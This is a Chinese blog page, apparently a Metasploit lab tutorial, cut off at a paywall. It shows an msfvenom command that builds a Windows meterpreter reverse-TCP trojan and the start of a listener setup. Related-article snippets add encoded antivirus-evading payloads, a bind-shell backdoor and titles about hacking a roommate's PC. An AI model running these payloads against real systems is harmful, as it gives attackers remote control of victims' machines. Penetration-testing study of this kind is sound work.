MSF生成shell连接win2012

最新推荐文章于 2024-06-02 00:40:48 发布
最新推荐文章于 2024-06-02 00:40:48 发布
阅读量940 收藏 1
点赞数 1
文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51153463/article/details/124632781
版权

实验环境
kali:192.168.98.168
win2012:192.168.98.167

生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.98.168(kali ip) LPORT=777 -f exe > shell.exe    #生成的文件上传到目标机器并执行

设置监听

use exploit/multi/handler     #创建监听
set payload windows/x64/meterpreter/reverse_tcp
set
最低0.47元/天 解锁文章
msf连接mysql数据库_msf链接数据库
weixin_31974659的博客
01-27 933
《Metasploit渗透测试手册》—第1章1.8节在Metasploit框架中建立数据库本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第1章1.8节在Metasploit框架中建立数据库,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。1.8 在Metasploit框架中建立数据库Metasploit渗透测试手册Meta...文章异步...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1149
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msf登陆Windows 2
weixin_38167847的博客
06-10 206
使用ms17_010(永恒之蓝)进行攻击登陆(XP) 加载模块 ​​​ 连接靶机 ​​​ 设置payload ​​​ 设置lhost(攻击主机IP) ​​​ exploit进行攻击登陆 转载于:https://www.cnblogs.com/qftm/p/10317192.html...
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1205
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
msf之正向shell的使用
shy的博客
09-28 1万+
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。 1,生成正向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是正向sh.
今天简单黑一下室友电脑:MSF提权开启远程桌面并连接
kjuhfkicf154的博客
01-04 3850
今天简单黑一下室友电脑~
MSF 生成静态免杀shellwin
嘻嘻哈哈
01-26 2805
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
Cs与msf互传shell
2201_75387456的博客
06-02 493
首先咋们需要准备两台kali,一台win10靶机咋们利用kali1打开cs,利用kali2打开msf进行联动;在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)然后在kali2启动msf,使用监听模块命令:msfconsole //进入msf控制台use exploit/multi/handler //进入监听模块。
【网络安全--反弹shell】注册机捆绑恶意程序上线MSF
m0_67844671的博客
05-30 437
【网络安全--反弹shell】注册机捆绑恶意程序上线MSF 声明:郑重声明,本篇博客仅供学习与参考,若学习的内容用的不当,所产生的后果自负!!
利用msf生成后门拿shell
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
内网的MSF接收反向shell
m0_46736332的博客
10-27 3369
内网虚拟机MSF接收外网以及不同局域网机器的反向shell
利用MSF溢出漏洞提权windows server2012
qq_53409748的博客
03-29 1877
使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。
渗透之——win2012R2打Windows8.1-KB2919355
冰河的专栏
01-22 2090
安装有先后顺序 第一步: Windows8.1-KB2919442-x64.msu     下载链接:https://www.microsoft.com/zh-cn/download/details.aspx?id=42153 第二步: clearcompressionflag.exe     下载链接:https://www.microsoft.com/zh-CN/download/de...
漏洞利用五:微软其他类型漏洞利用
ZY95001的博客
09-04 542
一、 二、 三、
windows server 2012主机漏洞-复现-修复
weixin_42881032的博客
09-16 1万+
windows server 2012 目录windows server 2012Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)复现Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010) Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CV
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
热门推荐
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
利用MSF&CS溢出漏洞提权云服务器windows server2012
weixin_45701675的博客
11-16 2434
Windows系统内核溢出漏洞提权 溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。 利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关
使用metasploit(MSF)对windows的ms12-020漏洞进行利用的过程
D-river博客
11-10 1万+
前言攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP,默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。 0x01 实验环境攻击机:kali linux ip:192.168.8.130 目标机:windows server 200
MSF 内网渗透(案例)
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 winlinux shellmsf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
msf 渗透攻击 win7 主机32位
最新发布
12-03
Metasploit Framework (Msf) 是一款广泛使用的开源渗透测试工具,它允许安全专家进行各种类型的攻击,包括Windows系统如Win7主机的渗透测试。针对32位的Win7主机,Msf 提供了一系列payloads和exploits,用于利用系统漏洞、远程代码执行等。 首先,你需要获取并安装Metasploit框架,可以在这里下载适合32位系统的版本:https://www.metasploit.com/download 然后,连接到目标32位Win7机器通常需要使用Meterpreter shell,这是一种轻量级的交互式环境。在Msf成功发起攻击并通过 exploitation模块找到合适漏洞后,会生成Payload(攻击链),比如: ``` use exploit/multi/handler set payload windows/x86/shell_reverse_tcp set lhost <your-lanip> set lport <your-listening-port> exploit ``` 这里`windows/x86/shell_reverse_tcp`是一个示例payload,它会在目标机器上创建一个反向连接监听的shell。执行后,Msf会尝试触发payload,并通过指定的IP和端口接收控制连接
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浅*默

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值